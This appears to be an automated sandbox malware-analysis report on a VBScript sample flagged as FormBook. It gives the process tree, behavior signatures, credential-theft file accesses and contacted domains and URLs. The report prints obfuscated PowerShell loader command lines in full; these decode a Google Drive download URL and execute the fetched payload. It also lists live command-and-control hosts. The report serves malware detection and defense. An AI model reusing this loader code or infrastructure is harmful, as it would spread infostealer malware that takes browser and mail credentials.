tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430127 Sample: PO 26519PZ F30 59.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 49 www.collegeclubapparel.com 2->49 51 www.vvbgsekbo.store 2->51 53 4 other IPs or domains 2->53 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 4 other signatures 2->73 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 wab.exe 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 97 VBScript performs obfuscated calls to suspicious functions 12->97 99 Suspicious powershell command line found 12->99 101 Wscript starts Powershell (via cmd or directly) 12->101 103 2 other signatures 12->103 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 55 drive.usercontent.google.com 142.250.65.225, 443, 49701, 49711 GOOGLEUS United States 21->55 57 drive.google.com 142.250.81.238, 443, 49700, 49710 GOOGLEUS United States 21->57 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 93 Writes to foreign memory regions 25->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 25->95 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        process11 signatures12 65 Maps a DLL or memory area into another process 32->65 37 sLGpONHtWjN.exe 32->37 injected process13 signatures14 75 Maps a DLL or memory area into another process 37->75 77 Found direct / indirect Syscall (likely to bypass EDR) 37->77 40 icacls.exe 1 13 37->40         started        process15 signatures16 85 Tries to steal Mail credentials (via file / registry access) 40->85 87 Tries to harvest and steal browser information (history, passwords, etc) 40->87 89 Modifies the context of a thread in another process (thread injection) 40->89 91 2 other signatures 40->91 43 sLGpONHtWjN.exe 40->43 injected 47 firefox.exe 40->47         started        process17 dnsIp18 59 www.blueberry-breeze.com 91.195.240.117, 49714, 49715, 49716 SEDO-ASDE Germany 43->59 61 www.vvbgsekbo.store 43.132.169.95, 49718, 49719, 49720 LILLY-ASUS Japan 43->61 63 www.elysiangame.online 174.138.177.173, 49713, 80 IS-AS-1US United States 43->63 105 Found direct / indirect Syscall (likely to bypass EDR) 43->105 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.117
 www.blueberry-breeze.com Germany
47846 SEDO-ASDE false
174.138.177.173
 www.elysiangame.online United States
19318 IS-AS-1US false
43.132.169.95
 www.vvbgsekbo.store Japan 4249 LILLY-ASUS false
142.250.65.225
 drive.usercontent.google.com United States
15169 GOOGLEUS false
142.250.81.238
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
www.elysiangame.online 174.138.177.173 true
drive.google.com 142.250.81.238 true
drive.usercontent.google.com 142.250.65.225 true
www.blueberry-breeze.com 91.195.240.117 true
www.vvbgsekbo.store 43.132.169.95 true
www.collegeclubapparel.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.blueberry-breeze.com/bnz5/ false unknown
http://www.elysiangame.online/bnz5/?0TFT4=uPhDJ26p&OLTx7p=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQVTCjZfM+P/Gg1ZlgpbDGRDiHo+BBw02A4+u5sqR3NAzj+twq1/A= false
    		unknown
    http://www.vvbgsekbo.store/bnz5/ false unknown
    http://www.blueberry-breeze.com/bnz5/?OLTx7p=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVF0n4DqYSIgGlD+rIwihPR/pSypoeDE6i9dqJvHBXbQcbaAkLZ9U=&0TFT4=uPhDJ26p false
      		unknown